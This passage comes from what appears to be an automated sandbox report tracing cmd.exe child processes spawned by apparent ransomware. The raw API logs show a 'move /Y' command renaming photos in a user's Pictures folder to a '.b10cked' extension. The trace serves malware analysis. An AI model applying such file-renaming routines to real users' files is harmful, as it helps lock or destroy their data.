lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f918, cchData=128 | out: lpLCData="1") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.815] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.815] GetConsoleTitleW (in: lpConsoleTitle=0x160928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.816] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.816] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.816] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.816] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.816] _wcsicmp (_String1="move", _String2=")") returned 68 [0144.816] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0144.816] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0144.816] _wcsicmp (_String1="IF", _String2="move") returned -4 [0144.816] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0144.817] _wcsicmp (_String1="REM", _String2="move") returned 5 [0144.817] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0144.820] GetConsoleTitleW (in: lpConsoleTitle=0x12f610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.820] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0144.820] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0144.820] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0144.820] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0144.820] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0144.820] _wcsicmp (_String1="move", _String2="CD") returned 10 [0144.820] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0144.820] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0144.820] _wcsicmp (_String1="move", _String2="REN") returned -5 [0144.820] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0144.820] _wcsicmp (_String1="move", _String2="SET") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0144.821] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0144.821] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0144.821] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0144.821] _wcsicmp (_String1="move", _String2="MD") returned 11 [0144.821] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0144.821] _wcsicmp (_String1="move", _String2="RD") returned -5 [0144.821] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0144.821] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0144.821] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0144.821] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0144.821] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0144.821] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0144.821] _wcsicmp (_String1="move", _String2="VER") returned -9 [0144.821] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0144.821] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0144.821] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0144.821] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0144.821] _wcsicmp (_String1="move", _String2="START") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0144.821] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0144.821] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0144.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.823] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f3cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0144.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0144.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0144.825] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0144.825] _wcsicmp (_String1="QGVEFX~1.JPG", _String2=".") returned 67 [0144.825] _wcsicmp (_String1="QGVEFX~1.JPG", _String2="..") returned 67 [0144.825] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefx~1.jpg")) returned 0x20 [0144.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x171f10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.826] SetErrorMode (uMode=0x0) returned 0x0 [0144.826] SetErrorMode (uMode=0x1) returned 0x0 [0144.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", nBufferLength=0x104, lpBuffer=0x12ed54, lpFilePart=0x12ed3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", lpFilePart=0x12ed3c*="QGVEFX~1.JPG") returned 0x38 [0144.826] SetErrorMode (uMode=0x0) returned 0x1 [0144.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x12 [0144.826] _wcsicmp (_String1="QGVEFX~1.JPG", _String2=".") returned 67 [0144.826] _wcsicmp (_String1="QGVEFX~1.JPG", _String2="..") returned 67 [0144.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefx~1.jpg")) returned 0x20 [0144.826] SetErrorMode (uMode=0x0) returned 0x0 [0144.826] SetErrorMode (uMode=0x1) returned 0x0 [0144.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", nBufferLength=0x104, lpBuffer=0x12f1d0, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", lpFilePart=0x12ef68*="QGVEFX~1.JPG") returned 0x38 [0144.826] SetErrorMode (uMode=0x0) returned 0x1 [0144.827] SetErrorMode (uMode=0x0) returned 0x0 [0144.827] SetErrorMode (uMode=0x1) returned 0x0 [0144.827] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x12f3d8, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", lpFilePart=0x12ef68*="qgVefxhoS8T3s19q574.jpg.b10cked") returned 0x4b [0144.827] SetErrorMode (uMode=0x0) returned 0x1 [0144.827] SetLastError (dwErrCode=0x0) [0144.827] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg.b10cked")) returned 0xffffffff [0144.827] GetLastError () returned 0x2 [0144.827] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x12e8e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8e4) returned 0x172120 [0144.827] FindNextFileW (in: hFindFile=0x172120, lpFindFileData=0x12e8e4 | out: lpFindFileData=0x12e8e4) returned 0 [0144.828] GetLastError () returned 0x12 [0144.828] FindClose (in: hFindFile=0x172120 | out: hFindFile=0x172120) returned 1 [0144.829] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x171cb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x171cb0) returned 0x172120 [0144.829] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", lpFilePart=0x0) returned 0x4b [0144.829] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg", lpFilePart=0x0) returned 0x43 [0144.829] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg")) returned 0x20 [0144.829] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg.b10cked"), dwFlags=0x3) returned 1 [0144.830] FindClose (in: hFindFile=0x172120 | out: hFindFile=0x172120) returned 1 [0144.830] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb30 | out: _Buffer=" 1") returned 9 [0144.830] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.830] GetFileType (hFile=0x7) returned 0x2 [0144.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.968] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12eabc | out: lpMode=0x12eabc) returned 1 [0144.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.968] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eaf0 | out: lpConsoleScreenBufferInfo=0x12eaf0) returned 1 [0144.968] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0144.969] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eb30 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0144.969] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eb14, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eb14*=0x1a) returned 1 [0144.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.969] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.969] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.970] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.970] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.970] SetConsoleInputExeNameW () returned 0x1 [0144.970] GetConsoleOutputCP () returned 0x1b5 [0144.970] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.970] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.970] exit (_Code=0) Process: id = "195" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0x88c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17170 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17171 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17172 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17173 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17174 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17175 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17176 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17177 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17178 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 17179 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17268 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17269 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17270 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17271 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17272 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 17273 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17274 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17275 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17276 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17277 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17278 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17279 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17280 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17281 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17282 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 17283 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17284 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17285 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17286 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17287 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 17288 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17289 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 17290 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 17291 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 252 os_tid = 0x9cc [0144.908] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8d4 | out: lpSystemTimeAsFileTime=0x2cf8d4*(dwLowDateTime=0x904e7aa0, dwHighDateTime=0x1d440a9)) [0144.908] GetCurrentProcessId () returned 0x88c [0144.908] GetCurrentThreadId () returned 0x9cc [0144.908] GetTickCount () returned 0x2d2f7 [0144.908] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8cc | out: lpPerformanceCount=0x2cf8cc*=20169692202) returned 1 [0144.908] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.908] __set_app_type (_Type=0x1) [0144.908] __p__fmode () returned 0x76b331f4 [0144.909] __p__commode () returned 0x76b331fc [0144.909] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.909] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.909] GetCurrentThreadId () returned 0x9cc [0144.909] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x38 [0144.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.909] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.909] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.909] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf864 | out: phkResult=0x2cf864*=0x0) returned 0x2 [0144.909] VirtualQuery (in: lpAddress=0x2cf89b, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.910] GetConsoleOutputCP () returned 0x1b5 [0144.910] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.910] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.910] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.910] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.910] SetConsoleMode 